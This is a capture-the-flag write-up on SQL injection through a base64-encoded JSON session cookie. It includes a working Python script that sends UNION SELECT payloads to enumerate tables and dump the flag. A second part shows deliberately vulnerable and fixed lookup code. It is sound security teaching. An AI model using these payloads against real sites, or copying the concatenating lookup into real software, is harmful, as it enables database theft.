The Challenge

The snack shop stores the session cart (or preference) as a base64-encoded JSON cookie. The backend decodes it and runs SELECT ... WHERE id = <cookie_id>. None of the user-visible fields are injectable — the vulnerability is in the cookie.

Approach

Three-phase UNION-based injection:

  1. Enumerate tables: UNION SELECT table_name FROM information_schema.tables WHERE table_schema = database()
  2. Enumerate columns: UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'flags'
  3. Dump the flag: UNION SELECT flag FROM flags

Each payload is placed in the ID field of the JSON object, the whole JSON is base64-encoded, and the result is set as the cookie value.

Solution

import requests, base64, json

site = "http://sn4ck.challs.olicyber.it/"

def make_cookie(payload):
    # Put the payload in the JSON "ID" field and base64-encode the whole object,
    # matching the format the backend expects for its session cookie.
    data = json.dumps({"ID": payload})
    return base64.b64encode(data.encode()).decode()

session = requests.Session()

# Phase 1: enumerate tables.
# The leading "0" matches no real row; the trailing "-- " comments out the rest of the query.
c1 = make_cookie("0 UNION SELECT table_name FROM information_schema.tables WHERE table_schema = database() -- ")
r1 = session.get(site, cookies={"session": c1})
print("TABLES:", r1.text)

# Phase 2: enumerate columns in 'flags'
c2 = make_cookie("0 UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'flags' -- ")
r2 = session.get(site, cookies={"session": c2})
print("COLUMNS:", r2.text)

# Phase 3: extract flag
c3 = make_cookie("0 UNION SELECT flag FROM flags -- ")
r3 = session.get(site, cookies={"session": c3})
print("FLAG:", r3.text)

make_cookie() serialises the dict, base64-encodes it, and returns the cookie value. The 0 UNION SELECT prefix ensures the original row is empty (no real ID=0) so only the injected row is returned.

What I Learned

Cookie values that are base64-decoded and used in SQL queries without parameterisation are SQL-injectable. The encoding layer is not a sanitisation layer. All transport formats — cookies, headers, JSON — must treat their contents as untrusted input and use parameterised queries.
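To make the lesson concrete from the backend's side, here is an added example (my own code, not the challenge's source) of the cookie-handling pattern that was exploited, beside two fixes. It uses an in-memory SQLite database with a constructed schema (an items table and a flags table) standing in for the shop's real one, so it runs offline. lookup_unsafe concatenates the decoded ID into the query exactly as the writeup describes; lookup_parameterised shows that binding the value as a parameter already defeats the phase-3 payload; lookup_safe adds a type check so a non-numeric ID is rejected before any query runs.

```python
import base64
import json
import sqlite3

# Constructed sample schema standing in for the snack shop's backend (not the
# challenge's real database): a product table looked up by ID, plus a flags
# table that a UNION payload can reach once the query is injectable.
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE flags (flag TEXT);
        INSERT INTO items VALUES (1, 'pretzel'), (2, 'chips');
        INSERT INTO flags VALUES ('flag{constructed-sample}');
    """)
    return conn

def encode_cookie(obj):
    """Same shape as the writeup's make_cookie(): JSON, then base64."""
    return base64.b64encode(json.dumps(obj).encode()).decode()

def decode_cookie(cookie):
    """Reverse the encoding. Decoding is not validation: whatever string the
    client put in "ID" comes back out unchanged."""
    return json.loads(base64.b64decode(cookie, validate=True))

def lookup_unsafe(conn, cookie):
    """The vulnerable pattern: the decoded ID is concatenated into the SQL."""
    data = decode_cookie(cookie)
    sql = "SELECT name FROM items WHERE id = " + str(data["ID"])
    return [row[0] for row in conn.execute(sql)]

def lookup_parameterised(conn, cookie):
    """Parameterisation alone: the ID is bound as a value, so the payload is
    compared against the id column as an opaque string and matches nothing."""
    data = decode_cookie(cookie)
    rows = conn.execute("SELECT name FROM items WHERE id = ?", (data["ID"],))
    return [row[0] for row in rows]

def lookup_safe(conn, cookie):
    """Hardened handler: enforce the expected type before the query, then bind."""
    data = decode_cookie(cookie)
    if not isinstance(data, dict):
        raise ValueError("cookie must decode to a JSON object")
    raw = data.get("ID")
    # bool is a subclass of int in Python, so exclude it explicitly.
    if isinstance(raw, bool) or not isinstance(raw, (int, str)):
        raise ValueError("ID must be an integer")
    if isinstance(raw, str):
        if not raw.isdecimal():
            raise ValueError("ID must be an integer")
        raw = int(raw)
    if raw < 0:
        raise ValueError("ID must be non-negative")
    rows = conn.execute("SELECT name FROM items WHERE id = ?", (raw,))
    return [row[0] for row in rows]

if __name__ == "__main__":
    conn = setup_db()
    honest = encode_cookie({"ID": 1})
    # The writeup's phase-3 payload, placed in the cookie's ID field.
    hostile = encode_cookie({"ID": "0 UNION SELECT flag FROM flags -- "})
    print("unsafe, honest :", lookup_unsafe(conn, honest))
    print("unsafe, hostile:", lookup_unsafe(conn, hostile))
    print("param,  hostile:", lookup_parameterised(conn, hostile))
    try:
        lookup_safe(conn, hostile)
    except ValueError as e:
        print("safe,   hostile: rejected:", e)
```

Parameterisation is the fix that closes the injection; the type check in lookup_safe is defence in depth, so that a malformed cookie fails loudly (and can be logged) instead of silently returning an empty result.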